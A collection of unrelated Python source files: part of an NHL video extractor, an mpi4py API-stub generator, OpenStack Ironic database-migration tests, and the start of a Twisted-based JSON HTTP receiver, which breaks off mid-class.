'id': '999',
'title': 'Highlights',
},
'playlist_count': 12,
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
team = mobj.group('team')
webpage = self._download_webpage(url, team)
cat_id = self._search_regex(
[r'var defaultCatId = "(.+?)";',
r'{statusIndex:0,index:0,.*?id:(.*?),'],
webpage, 'category id')
playlist_title = self._html_search_regex(
r'tab0"[^>]*?>(.*?)</td>',
webpage, 'playlist title', flags=re.DOTALL).lower().capitalize()
data = compat_urllib_parse_urlencode({
'cid': cat_id,
# This is the default value
'count': 12,
'ptrs': 3,
'format': 'json',
})
path = '/videocenter/servlets/browse?' + data
request_url = compat_urlparse.urljoin(url, path)
response = self._download_webpage(request_url, playlist_title)
response = self._fix_json(response)
if not response.strip():
self._downloader.report_warning('Got an empty response, trying '
'to add the "newvideos" parameter')
response = self._download_webpage(request_url + '&newvideos=true',
playlist_title)
response = self._fix_json(response)
videos = json.loads(response)
return {
'_type': 'playlist',
'title': playlist_title,
'id': cat_id,
'entries': [self._extract_video(v) for v in videos],
}
class NHLIE(InfoExtractor):
IE_NAME = 'nhl.com'
_VALID_URL = r'https?://(?:www\.)?(?P<site>nhl|wch2016)\.com/(?:[^/]+/)*c-(?P<id>\d+)'
_SITES_MAP = {
'nhl': 'nhl',
'wch2016': 'wch',
}
_TESTS = [{
# type=video
'url': 'https://www.nhl.com/video/anisimov-cleans-up-mess/t-277752844/c-43663503',
'md5': '0f7b9a8f986fb4b4eeeece9a56416eaf',
'info_dict': {
'id': '43663503',
'ext': 'mp4',
'title': 'Anisimov cleans up mess',
'description': 'md5:a02354acdfe900e940ce40706939ca63',
'timestamp': 1461288600,
'upload_date': '20160422',
},
}, {
# type=article
'url': 'https://www.nhl.com/news/dennis-wideman-suspended/c-278258934',
'md5': '1f39f4ea74c1394dea110699a25b366c',
'info_dict': {
'id': '40784403',
'ext': 'mp4',
'title': 'Wideman suspended by NHL',
'description': 'Flames defenseman Dennis Wideman was banned 20 games for violation of Rule 40 (Physical Abuse of Officials)',
'upload_date': '20160204',
'timestamp': 1454544904,
},
}, {
'url': 'https://www.wch2016.com/video/caneur-best-of-game-2-micd-up/t-281230378/c-44983703',
'only_matching': True,
}, {
'url': 'https://www.wch2016.com/news/3-stars-team-europe-vs-team-canada/c-282195068',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
tmp_id, site = mobj.group('id'), mobj.group('site')
video_data = self._download_json(
'https://nhl.bamcontent.com/%s/id/v1/%s/details/web-v1.json'
% (self._SITES_MAP[site], tmp_id), tmp_id)
if video_data.get('type') == 'article':
video_data = video_data['media']
video_id = compat_str(video_data['id'])
title = video_data['title']
formats = []
for playback in video_data.get('playbacks', []):
playback_url = playback.get('url')
if not playback_url:
continue
ext = determine_ext(playback_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
playback_url, video_id, 'mp4', 'm3u8_native',
m3u8_id=playback.get('name', 'hls'), fatal=False))
else:
height = int_or_none(playback.get('height'))
formats.append({
'format_id': playback.get('name', 'http' + ('-%dp' % height if height else '')),
'url': playback_url,
'width': int_or_none(playback.get('width')),
'height': height,
})
self._sort_formats(formats, ('preference', 'width', 'height', 'tbr', 'format_id'))
thumbnails = []
for thumbnail_id, thumbnail_data in video_data.get('image', {}).get('cuts', {}).items():
thumbnail_url = thumbnail_data.get('src')
if not thumbnail_url:
continue
thumbnails.append({
'id': thumbnail_id,
'url': thumbnail_url,
'width': int_or_none(thumbnail_data.get('width')),
'height': int_or_none(thumbnail_data.get('height')),
})
return {
'id': video_id,
'title': title,
'description': video_data.get('description'),
'timestamp': parse_iso8601(video_data.get('date')),
'duration': parse_duration(video_data.get('duration')),
'thumbnails': thumbnails,
'formats': formats,
}
|
|
import os
import sys
import inspect
from textwrap import dedent
from textwrap import indent
def is_function(obj):
return inspect.isbuiltin(obj) or type(obj) is type(ord)
def is_method(obj):
return inspect.ismethoddescriptor(obj) or type(obj) in (
type(str.index),
type(str.__add__),
type(str.__new__),
)
def is_classmethod(obj):
return inspect.isbuiltin(obj) or type(obj).__name__ in (
'classmethod',
'classmethod_descriptor',
)
def is_staticmethod(obj):
return type(obj).__name__ in (
'staticmethod',
)
def is_datadescr(obj):
return inspect.isdatadescriptor(obj) and not hasattr(obj, 'fget')
def is_property(obj):
return inspect.isdatadescriptor(obj) and hasattr(obj, 'fget')
def is_class(obj):
return inspect.isclass(obj) or type(obj) is type(int)
class Lines(list):
INDENT = " " * 4
level = 0
@property
def add(self):
return self
@add.setter
def add(self, lines):
if lines is None:
return
if isinstance(lines, str):
lines = dedent(lines).strip().split("\n")
indent = self.INDENT * self.level
for line in lines:
self.append(indent + line)
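# Minimal sketch of the Lines helper used throughout this script: assigning to
# the `add` property dedents/splits the text and appends it at the current
# indentation level.
#
#     lines = Lines()
#     lines.add = "class Foo:"
#     lines.level += 1
#     lines.add = "x: int = 0"    # stored as "    x: int = 0"
#     lines.level -= 1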
def signature(obj):
doc = obj.__doc__
sig = doc.split('\n', 1)[0].split('.', 1)[-1]
return sig
def docstring(obj):
doc = obj.__doc__
doc = doc.split('\n', 1)[1]
doc = dedent(doc).strip()
doc = f'"""{doc}"""'
doc = indent(doc, Lines.INDENT)
return doc
def apidoc_constant(constant):
name, value = constant
typename = type(value).__name__
init = f"_def({typename}, '{name}')"
doc = f"#: :class:`{typename}` ``{name}``"
return f"{name}: {typename} = {init} {doc}\n"
def apidoc_function(function):
sig = signature(function)
doc = docstring(function)
body = Lines.INDENT + "..."
return f"def {sig}:\n{doc}\n{body}\n"
def apidoc_method(method):
sig = signature(method)
doc = docstring(method)
body = Lines.INDENT + "..."
return f"def {sig}:\n{doc}\n{body}\n"
def apidoc_datadescr(datadescr, name=None):
sig = signature(datadescr)
doc = docstring(datadescr)
name = sig.split(':')[0].strip()
type = sig.split(':')[1].strip()
sig = f"{name}(self) -> {type}"
body = Lines.INDENT + "..."
return f"@property\ndef {sig}:\n{doc}\n{body}\n"
def apidoc_property(prop, name=None):
sig = signature(prop.fget)
name = name or prop.fget.__name__
type = sig.rsplit('->', 1)[-1].strip()
sig = f"{name}(self) -> {type}"
doc = f'"""{prop.__doc__}"""'
doc = indent(doc, Lines.INDENT)
body = Lines.INDENT + "..."
return f"@property\ndef {sig}:\n{doc}\n{body}\n"
def apidoc_constructor(cls, name='__init__'):
init = (name == '__init__')
argname = cls.__mro__[-2].__name__.lower()
argtype = cls.__name__
initarg = f"{argname}: Optional[{argtype}] = None"
selfarg = 'self' if init else 'cls'
rettype = 'None' if init else argtype
arglist = f"{selfarg}, {initarg}"
sig = f"{name}({arglist}) -> {rettype}"
ret = '...' if init else 'return super().__new__(cls)'
body = Lines.INDENT + ret
return f"def {sig}:\n{body}"
def apidoc_class(cls, done=None):
skip = {
'__doc__',
'__module__',
'__weakref__',
'__pyx_vtable__',
'__lt__',
'__le__',
'__ge__',
'__gt__',
}
special = {
'__len__': "__len__(self) -> int",
'__bool__': "__bool__(self) -> bool",
'__hash__': "__hash__(self) -> int",
'__int__': "__int__(self) -> int",
'__index__': "__index__(self) -> int",
'__str__': "__str__(self) -> str",
'__repr__': "__repr__(self) -> str",
'__eq__': "__eq__(self, other: Any) -> bool",
'__ne__': "__ne__(self, other: Any) -> bool",
}
constructor = {
'__new__',
'__init__',
}
override = OVERRIDE.get(cls.__name__, {})
done = set() if done is None else done
lines = Lines()
base = cls.__base__
if base is object:
lines.add = f"class {cls.__name__}:"
else:
lines.add = f"class {cls.__name__}({base.__name__}):"
lines.level += 1
doc = cls.__doc__
doc = dedent(doc).strip()
if doc.startswith(f"{cls.__name__}("):
doc = doc.split('\n', 1)[1].strip()
lines.add = f'"""{doc}"""'
for name in constructor:
if name in override:
done.update(constructor)
lines.add = override[name]
break
for name in constructor:
if name in done:
break
if name in cls.__dict__:
done.update(constructor)
lines.add = apidoc_constructor(cls, name)
break
if '__hash__' in cls.__dict__:
if cls.__hash__ is None:
done.add('__hash__')
dct = cls.__dict__
keys = list(dct.keys())
for name in keys:
if name in done:
continue
if name in skip:
continue
if name in override:
done.add(name)
lines.add = override[name]
continue
if name in special:
done.add(name)
sig = special[name]
lines.add = f"def {sig}: ..."
continue
if name in constructor:
done.update(constructor)
lines.add = apidoc_constructor(cls)
continue
attr = getattr(cls, name)
if is_method(attr):
done.add(name)
if name == attr.__name__:
obj = dct[name]
if is_classmethod(obj):
lines.add = f"@classmethod"
elif is_staticmethod(obj):
lines.add = f"@staticmethod"
lines.add = apidoc_method(attr)
elif False:
lines.add = f"{name} = {attr.__name__}"
continue
if is_datadescr(attr):
done.add(name)
lines.add = apidoc_datadescr(attr)
continue
if is_property(attr):
done.add(name)
lines.add = apidoc_property(attr, name)
continue
leftovers = [name for name in keys if
name not in done and name not in skip]
assert not leftovers, f"leftovers: {leftovers}"
lines.level -= 1
return lines
def apidoc_module(module, done=None):
skip = {
'__doc__',
'__name__',
'__loader__',
'__spec__',
'__file__',
'__package__',
'__builtins__',
'__pyx_capi__',
}
done = set() if done is None else done
lines = Lines()
keys = list(module.__dict__.keys())
keys.sort(key=lambda name: name.startswith("_"))
constants = [
(name, getattr(module, name)) for name in keys
if all((
name not in done and name not in skip,
isinstance(getattr(module, name), int),
))
]
for _, value in constants:
cls = type(value)
name = cls.__name__
if name in done or name in skip:
continue
if cls.__module__ == module.__name__:
done.add(name)
lines.add = apidoc_class(cls)
lines.add = ""
for name, value in constants:
done.add(name)
if name in OVERRIDE:
lines.add = OVERRIDE[name]
else:
lines.add = apidoc_constant((name, value))
if constants:
lines.add = ""
for name in keys:
if name in done or name in skip:
continue
value = getattr(module, name)
if is_class(value):
done.add(name)
lines.add = apidoc_class(value)
lines.add = ""
instances = [
(k, getattr(module, k)) for k in keys
if all((
k not in done and k not in skip,
type(getattr(module, k)) is value,
))
]
for attrname, attrvalue in instances:
done.add(attrname)
lines.add = apidoc_constant((attrname, attrvalue))
if instances:
lines.add = ""
continue
if is_function(value):
done.add(name)
if name == value.__name__:
lines.add = apidoc_function(value)
else:
lines.add = f"{name} = {value.__name__}"
continue
lines.add = ""
for name in keys:
if name in done or name in skip:
continue
value = getattr(module, name)
done.add(name)
if name in OVERRIDE:
lines.add = OVERRIDE[name]
else:
lines.add = apidoc_constant((name, value))
leftovers = [name for name in keys if
name not in done and name not in skip]
assert not leftovers, f"leftovers: {leftovers}"
return lines
IMPORTS = """
from __future__ import annotations
"""
HELPERS = """
class _Int(int): pass
def _repr(obj):
try:
return obj._name
except AttributeError:
return super(obj).__repr__()
def _def(cls, name):
if cls is int:
cls = _Int
obj = cls()
if cls.__name__ in ('Pickle', 'memory'):
return obj
obj._name = name
if '__repr__' not in cls.__dict__:
cls.__repr__ = _repr
return obj
"""
OVERRIDE = {
'Exception': {
'__new__': (
"def __new__(cls, ierr: int = SUCCESS) -> Exception:\n"
" return super().__new__(cls, ierr)"),
"__lt__": "def __lt__(self, other: int) -> bool: ...",
"__le__": "def __le__(self, other: int) -> bool: ...",
"__gt__": "def __gt__(self, other: int) -> bool: ...",
"__ge__": "def __ge__(self, other: int) -> bool: ...",
},
'Info': {
'__iter__':
"def __iter__(self) -> Iterator[str]: ...",
'__getitem__':
"def __getitem__(self, item: str) -> str: ...",
'__setitem__':
"def __setitem__(self, item: str, value: str) -> None: ...",
'__delitem__':
"def __delitem__(self, item: str) -> None: ...",
'__contains__':
"def __contains__(self, value: str) -> bool: ...",
},
'Op': {
'__call__': "def __call__(self, x: Any, y: Any) -> Any: ...",
},
'memory': {
'__new__': (
"def __new__(cls, buf: Buffer) -> memory:\n"
" return super().__new__(cls)"),
'__getitem__': (
"def __getitem__(self, "
"item: Union[int, slice]) "
"-> Union[int, memory]: ..."),
'__setitem__': (
"def __setitem__(self, "
"item: Union[int, slice], "
"value: Union[int, Buffer]) "
"-> None: ..."),
'__delitem__': None,
},
'Pickle': {
'__init__': """
def __init__(self,
dumps: Optional[Callable[[Any, int], bytes]] = None,
loads: Optional[Callable[[Buffer], Any]] = None,
protocol: Optional[int] = None,
) -> None: ...
"""
},
'_typedict': "_typedict: Dict[str, Datatype] = {}",
'_typedict_c': "_typedict_c: Dict[str, Datatype] = {}",
'_typedict_f': "_typedict_f: Dict[str, Datatype] = {}",
'_keyval_registry': None,
}
ConstantTypes = (
'BottomType',
'InPlaceType',
)
for cls in ConstantTypes:
OVERRIDE[cls] = {
'__new__': (
f"def __new__(cls) -> {cls}:\n"
f" return super().__new__({cls})"),
'__repr__': "def __repr__(self) -> str: return self._name",
}
TYPING = """
from typing import (
Any,
Union,
Literal,
Optional,
NoReturn,
Final,
)
from typing import (
Callable,
Hashable,
Iterable,
Iterator,
Sequence,
Mapping,
)
from typing import (
Tuple,
List,
Dict,
)
from .typing import *
"""
def apidoc_mpi4py_MPI(done=None):
from mpi4py import MPI
lines = Lines()
lines.add = f'"""{MPI.__doc__}"""'
lines.add = IMPORTS
lines.add = ""
lines.add = HELPERS
lines.add = ""
lines.add = apidoc_module(MPI)
lines.add = ""
lines.add = TYPING
return lines
def generate(filename):
dirname = os.path.dirname(filename)
os.makedirs(dirname, exist_ok=True)
with open(filename, 'w') as f:
for line in apidoc_mpi4py_MPI():
print(line, file=f)
def load_module(filename, name=None):
if name is None:
name, _ = os.path.splitext(
os.path.basename(filename))
module = type(sys)(name)
module.__file__ = filename
module.__package__ = name.rsplit('.', 1)[0]
with open(filename) as f:
exec(f.read(), module.__dict__)
return module
_sys_modules = {}
def replace_module(module):
name = module.__name__
assert name not in _sys_modules
_sys_modules[name] = sys.modules[name]
sys.modules[name] = module
def restore_module(module):
name = module.__name__
assert name in _sys_modules
sys.modules[name] = _sys_modules[name]
def annotate(dest, source):
try:
dest.__annotations__ = source.__annotations__
except Exception:
pass
if isinstance(dest, type):
for name in dest.__dict__.keys():
if hasattr(source, name):
obj = getattr(dest, name)
annotate(obj, getattr(source, name))
if isinstance(dest, type(sys)):
for name in dir(dest):
if hasattr(source, name):
obj = getattr(dest, name)
mod = getattr(obj, '__module__', None)
if dest.__name__ == mod:
annotate(obj, getattr(source, name))
OUTDIR = 'reference'
if __name__ == '__main__':
generate(os.path.join(OUTDIR, 'mpi4py.MPI.py'))
|
|
# Copyright 2010-2011 OpenStack Foundation
# Copyright 2012-2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for database migrations. There are "opportunistic" tests for both mysql
and postgresql in here, which allows testing against these databases in a
properly configured unit test environment.
For the opportunistic testing you need to set up a db named 'openstack_citest'
with user 'openstack_citest' and password 'openstack_citest' on localhost.
The test will then use that db and u/p combo to run the tests.
For postgres on Ubuntu this can be done with the following commands:
::
sudo -u postgres psql
postgres=# create user openstack_citest with createdb login password
'openstack_citest';
postgres=# create database openstack_citest with owner openstack_citest;
"""
import contextlib
from alembic import script
import mock
from oslo_db import exception as db_exc
from oslo_db.sqlalchemy import enginefacade
from oslo_db.sqlalchemy import test_base
from oslo_db.sqlalchemy import test_migrations
from oslo_db.sqlalchemy import utils as db_utils
from oslo_log import log as logging
from oslo_utils import uuidutils
import sqlalchemy
import sqlalchemy.exc
from ironic.common.i18n import _LE
from ironic.db.sqlalchemy import migration
from ironic.db.sqlalchemy import models
from ironic.tests import base
LOG = logging.getLogger(__name__)
def _get_connect_string(backend, user, passwd, database):
"""Get database connection
Try to get a connection with a very specific set of values; if we can get
one, we run the tests, otherwise they are skipped.
"""
if backend == "postgres":
backend = "postgresql+psycopg2"
elif backend == "mysql":
backend = "mysql+mysqldb"
else:
raise Exception("Unrecognized backend: '%s'" % backend)
return ("%(backend)s://%(user)s:%(passwd)s@localhost/%(database)s"
% {'backend': backend, 'user': user, 'passwd': passwd,
'database': database})
def _is_backend_avail(backend, user, passwd, database):
try:
connect_uri = _get_connect_string(backend, user, passwd, database)
engine = sqlalchemy.create_engine(connect_uri)
connection = engine.connect()
except Exception:
# intentionally catch all to handle exceptions even if we don't
# have any backend code loaded.
return False
else:
connection.close()
engine.dispose()
return True
@contextlib.contextmanager
def patch_with_engine(engine):
with mock.patch.object(enginefacade.get_legacy_facade(),
'get_engine') as patch_engine:
patch_engine.return_value = engine
yield
class WalkVersionsMixin(object):
def _walk_versions(self, engine=None, alembic_cfg=None, downgrade=True):
# Determine latest version script from the repo, then
# upgrade from 1 through to the latest, with no data
# in the databases. This just checks that the schema itself
# upgrades successfully.
# Place the database under version control
with patch_with_engine(engine):
script_directory = script.ScriptDirectory.from_config(alembic_cfg)
self.assertIsNone(self.migration_api.version(alembic_cfg))
versions = [ver for ver in script_directory.walk_revisions()]
for version in reversed(versions):
self._migrate_up(engine, alembic_cfg,
version.revision, with_data=True)
if downgrade:
for version in versions:
self._migrate_down(engine, alembic_cfg, version.revision)
def _migrate_down(self, engine, config, version, with_data=False):
try:
self.migration_api.downgrade(version, config=config)
except NotImplementedError:
# NOTE(sirp): some migrations, namely release-level
# migrations, don't support a downgrade.
return False
self.assertEqual(version, self.migration_api.version(config))
# NOTE(sirp): `version` is what we're downgrading to (i.e. the 'target'
# version). So if we have any downgrade checks, they need to be run for
# the previous (higher numbered) migration.
if with_data:
post_downgrade = getattr(
self, "_post_downgrade_%s" % (version), None)
if post_downgrade:
post_downgrade(engine)
return True
def _migrate_up(self, engine, config, version, with_data=False):
"""migrate up to a new version of the db.
We allow for data insertion and post checks at every
migration version with special _pre_upgrade_### and
_check_### functions in the main test.
"""
# NOTE(sdague): try block is here because it's impossible to debug
# where a failed data migration happens otherwise
try:
if with_data:
data = None
pre_upgrade = getattr(
self, "_pre_upgrade_%s" % version, None)
if pre_upgrade:
data = pre_upgrade(engine)
self.migration_api.upgrade(version, config=config)
self.assertEqual(version, self.migration_api.version(config))
if with_data:
check = getattr(self, "_check_%s" % version, None)
if check:
check(engine, data)
except Exception:
LOG.error(_LE("Failed to migrate to version %(version)s on engine "
"%(engine)s"),
{'version': version, 'engine': engine})
raise
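# Hedged illustration of the hook convention described in _migrate_up above
# (the revision id is hypothetical): a checker mixin can seed data before a
# revision is applied and verify the schema/data afterwards.
#
#     def _pre_upgrade_abc123def456(self, engine):
#         nodes = db_utils.get_table(engine, 'nodes')
#         data = {'uuid': uuidutils.generate_uuid()}
#         nodes.insert().execute(data)
#         return data
#
#     def _check_abc123def456(self, engine, data):
#         nodes = db_utils.get_table(engine, 'nodes')
#         self.assertIn('uuid', [column.name for column in nodes.c])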
class TestWalkVersions(base.TestCase, WalkVersionsMixin):
def setUp(self):
super(TestWalkVersions, self).setUp()
self.migration_api = mock.MagicMock()
self.engine = mock.MagicMock()
self.config = mock.MagicMock()
self.versions = [mock.Mock(revision='2b2'), mock.Mock(revision='1a1')]
def test_migrate_up(self):
self.migration_api.version.return_value = 'dsa123'
self._migrate_up(self.engine, self.config, 'dsa123')
self.migration_api.upgrade.assert_called_with('dsa123',
config=self.config)
self.migration_api.version.assert_called_with(self.config)
def test_migrate_up_with_data(self):
test_value = {"a": 1, "b": 2}
self.migration_api.version.return_value = '141'
self._pre_upgrade_141 = mock.MagicMock()
self._pre_upgrade_141.return_value = test_value
self._check_141 = mock.MagicMock()
self._migrate_up(self.engine, self.config, '141', True)
self._pre_upgrade_141.assert_called_with(self.engine)
self._check_141.assert_called_with(self.engine, test_value)
def test_migrate_down(self):
self.migration_api.version.return_value = '42'
self.assertTrue(self._migrate_down(self.engine, self.config, '42'))
self.migration_api.version.assert_called_with(self.config)
def test_migrate_down_not_implemented(self):
self.migration_api.downgrade.side_effect = NotImplementedError
self.assertFalse(self._migrate_down(self.engine, self.config, '42'))
def test_migrate_down_with_data(self):
self._post_downgrade_043 = mock.MagicMock()
self.migration_api.version.return_value = '043'
self._migrate_down(self.engine, self.config, '043', True)
self._post_downgrade_043.assert_called_with(self.engine)
@mock.patch.object(script, 'ScriptDirectory')
@mock.patch.object(WalkVersionsMixin, '_migrate_up')
@mock.patch.object(WalkVersionsMixin, '_migrate_down')
def test_walk_versions_all_default(self, _migrate_up, _migrate_down,
script_directory):
fc = script_directory.from_config()
fc.walk_revisions.return_value = self.versions
self.migration_api.version.return_value = None
self._walk_versions(self.engine, self.config)
self.migration_api.version.assert_called_with(self.config)
upgraded = [mock.call(self.engine, self.config, v.revision,
with_data=True) for v in reversed(self.versions)]
self.assertEqual(self._migrate_up.call_args_list, upgraded)
downgraded = [mock.call(self.engine, self.config, v.revision)
for v in self.versions]
self.assertEqual(self._migrate_down.call_args_list, downgraded)
@mock.patch.object(script, 'ScriptDirectory')
@mock.patch.object(WalkVersionsMixin, '_migrate_up')
@mock.patch.object(WalkVersionsMixin, '_migrate_down')
def test_walk_versions_all_false(self, _migrate_up, _migrate_down,
script_directory):
fc = script_directory.from_config()
fc.walk_revisions.return_value = self.versions
self.migration_api.version.return_value = None
self._walk_versions(self.engine, self.config, downgrade=False)
upgraded = [mock.call(self.engine, self.config, v.revision,
with_data=True) for v in reversed(self.versions)]
self.assertEqual(upgraded, self._migrate_up.call_args_list)
class MigrationCheckersMixin(object):
def setUp(self):
super(MigrationCheckersMixin, self).setUp()
self.config = migration._alembic_config()
self.migration_api = migration
def test_walk_versions(self):
self._walk_versions(self.engine, self.config, downgrade=False)
def test_connect_fail(self):
"""Test that we can trigger a database connection failure
Test that we fail gracefully, to ensure we don't break people running
without a specific database backend configured.
"""
if _is_backend_avail(self.FIXTURE.DRIVER, "openstack_cifail",
self.FIXTURE.USERNAME, self.FIXTURE.DBNAME):
self.fail("Shouldn't have connected")
def _check_21b331f883ef(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('provision_updated_at', col_names)
self.assertIsInstance(nodes.c.provision_updated_at.type,
sqlalchemy.types.DateTime)
def _check_3cb628139ea4(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('console_enabled', col_names)
# in some backends bool type is integer
self.assertTrue(isinstance(nodes.c.console_enabled.type,
sqlalchemy.types.Boolean) or
isinstance(nodes.c.console_enabled.type,
sqlalchemy.types.Integer))
def _check_31baaf680d2b(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('instance_info', col_names)
self.assertIsInstance(nodes.c.instance_info.type,
sqlalchemy.types.TEXT)
def _check_3bea56f25597(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
instance_uuid = 'aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee'
data = {'driver': 'fake',
'uuid': uuidutils.generate_uuid(),
'instance_uuid': instance_uuid}
nodes.insert().values(data).execute()
data['uuid'] = uuidutils.generate_uuid()
self.assertRaises(db_exc.DBDuplicateEntry,
nodes.insert().execute, data)
def _check_242cc6a923b3(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('maintenance_reason', col_names)
self.assertIsInstance(nodes.c.maintenance_reason.type,
sqlalchemy.types.String)
def _pre_upgrade_5674c57409b9(self, engine):
# add some nodes in various states so we can assert that "None"
# was replaced by "available", and nothing else changed.
nodes = db_utils.get_table(engine, 'nodes')
data = [{'uuid': uuidutils.generate_uuid(),
'provision_state': 'fake state'},
{'uuid': uuidutils.generate_uuid(),
'provision_state': 'active'},
{'uuid': uuidutils.generate_uuid(),
'provision_state': 'deleting'},
{'uuid': uuidutils.generate_uuid(),
'provision_state': None}]
nodes.insert().values(data).execute()
return data
def _check_5674c57409b9(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
result = engine.execute(nodes.select())
def _get_state(uuid):
for row in data:
if row['uuid'] == uuid:
return row['provision_state']
for row in result:
old = _get_state(row['uuid'])
new = row['provision_state']
if old is None:
self.assertEqual('available', new)
else:
self.assertEqual(old, new)
def _check_bb59b63f55a(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('driver_internal_info', col_names)
self.assertIsInstance(nodes.c.driver_internal_info.type,
sqlalchemy.types.TEXT)
def _check_4f399b21ae71(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('clean_step', col_names)
self.assertIsInstance(nodes.c.clean_step.type,
sqlalchemy.types.String)
def _check_789acc877671(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('raid_config', col_names)
self.assertIn('target_raid_config', col_names)
self.assertIsInstance(nodes.c.raid_config.type,
sqlalchemy.types.String)
self.assertIsInstance(nodes.c.target_raid_config.type,
sqlalchemy.types.String)
def _check_2fb93ffd2af1(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
bigstring = 'a' * 255
uuid = uuidutils.generate_uuid()
data = {'uuid': uuid, 'name': bigstring}
nodes.insert().execute(data)
node = nodes.select(nodes.c.uuid == uuid).execute().first()
self.assertEqual(bigstring, node['name'])
def _check_516faf1bb9b1(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
bigstring = 'a' * 255
uuid = uuidutils.generate_uuid()
data = {'uuid': uuid, 'driver': bigstring}
nodes.insert().execute(data)
node = nodes.select(nodes.c.uuid == uuid).execute().first()
self.assertEqual(bigstring, node['driver'])
def _check_48d6c242bb9b(self, engine, data):
node_tags = db_utils.get_table(engine, 'node_tags')
col_names = [column.name for column in node_tags.c]
self.assertIn('tag', col_names)
self.assertIsInstance(node_tags.c.tag.type,
sqlalchemy.types.String)
nodes = db_utils.get_table(engine, 'nodes')
data = {'id': '123', 'name': 'node1'}
nodes.insert().execute(data)
data = {'node_id': '123', 'tag': 'tag1'}
node_tags.insert().execute(data)
tag = node_tags.select(node_tags.c.node_id == '123').execute().first()
self.assertEqual('tag1', tag['tag'])
def _check_5ea1b0d310e(self, engine, data):
portgroup = db_utils.get_table(engine, 'portgroups')
col_names = [column.name for column in portgroup.c]
expected_names = ['created_at', 'updated_at', 'id', 'uuid', 'name',
'node_id', 'address', 'extra']
self.assertEqual(sorted(expected_names), sorted(col_names))
self.assertIsInstance(portgroup.c.created_at.type,
sqlalchemy.types.DateTime)
self.assertIsInstance(portgroup.c.updated_at.type,
sqlalchemy.types.DateTime)
self.assertIsInstance(portgroup.c.id.type,
sqlalchemy.types.Integer)
self.assertIsInstance(portgroup.c.uuid.type,
sqlalchemy.types.String)
self.assertIsInstance(portgroup.c.name.type,
sqlalchemy.types.String)
self.assertIsInstance(portgroup.c.node_id.type,
sqlalchemy.types.Integer)
self.assertIsInstance(portgroup.c.address.type,
sqlalchemy.types.String)
self.assertIsInstance(portgroup.c.extra.type,
sqlalchemy.types.TEXT)
ports = db_utils.get_table(engine, 'ports')
col_names = [column.name for column in ports.c]
self.assertIn('pxe_enabled', col_names)
self.assertIn('portgroup_id', col_names)
self.assertIn('local_link_connection', col_names)
self.assertIsInstance(ports.c.portgroup_id.type,
sqlalchemy.types.Integer)
# in some backends bool type is integer
self.assertTrue(isinstance(ports.c.pxe_enabled.type,
sqlalchemy.types.Boolean) or
isinstance(ports.c.pxe_enabled.type,
sqlalchemy.types.Integer))
def test_upgrade_and_version(self):
with patch_with_engine(self.engine):
self.migration_api.upgrade('head')
self.assertIsNotNone(self.migration_api.version())
def test_create_schema_and_version(self):
with patch_with_engine(self.engine):
self.migration_api.create_schema()
self.assertIsNotNone(self.migration_api.version())
def test_upgrade_and_create_schema(self):
with patch_with_engine(self.engine):
self.migration_api.upgrade('31baaf680d2b')
self.assertRaises(db_exc.DbMigrationError,
self.migration_api.create_schema)
def test_upgrade_twice(self):
with patch_with_engine(self.engine):
self.migration_api.upgrade('31baaf680d2b')
v1 = self.migration_api.version()
self.migration_api.upgrade('head')
v2 = self.migration_api.version()
self.assertNotEqual(v1, v2)
class TestMigrationsMySQL(MigrationCheckersMixin,
WalkVersionsMixin,
test_base.MySQLOpportunisticTestCase):
pass
class TestMigrationsPostgreSQL(MigrationCheckersMixin,
WalkVersionsMixin,
test_base.PostgreSQLOpportunisticTestCase):
pass
class ModelsMigrationSyncMixin(object):
def get_metadata(self):
return models.Base.metadata
def get_engine(self):
return self.engine
def db_sync(self, engine):
with patch_with_engine(engine):
migration.upgrade('head')
class ModelsMigrationsSyncMysql(ModelsMigrationSyncMixin,
test_migrations.ModelsMigrationsSync,
test_base.MySQLOpportunisticTestCase):
pass
class ModelsMigrationsSyncPostgres(ModelsMigrationSyncMixin,
test_migrations.ModelsMigrationsSync,
test_base.PostgreSQLOpportunisticTestCase):
pass
|
|
from __future__ import print_function
import json
import pycurl
import re
import six
from six.moves.urllib.parse import urlencode
import twisted
from twisted.internet import reactor, threads
from twisted.internet.defer import Deferred, DeferredLock, DeferredSemaphore
from twisted.internet.protocol import Protocol
from twisted.web.client import Agent, FileBodyProducer, HTTPConnectionPool
from twisted.web.http_headers import Headers
from paradrop.base import nexus, settings
class JSONReceiver(Protocol):
"""
JSON Receiver
A JSONReceiver object can be used with the twisted HTTP client
to receive data from a request and provide it to a callback
function when complete.
Example (response came from an HTTP request):
finished = Deferred()
response.deliverBody(JSONReceiver(finished))
finished.addCallback(func_that_takes_result)
Some error conditions will result in the callback firing with a result of
None. The receiver needs to check for this. This seems to occur on 403
errors where the server does not return any data, but twisted just passes
us a ResponseDone object of the same type as a normal result.
"""
def __init__(self, response, finished):
"""
response: a twisted Response object
finished: a Deferred object
"""
self.response = response
self.finished = finished
self.data = ""
def dataReceived(self, data):
"""
internal: handles incoming data.
"""
self.data += data
def connectionLost(self, reason):
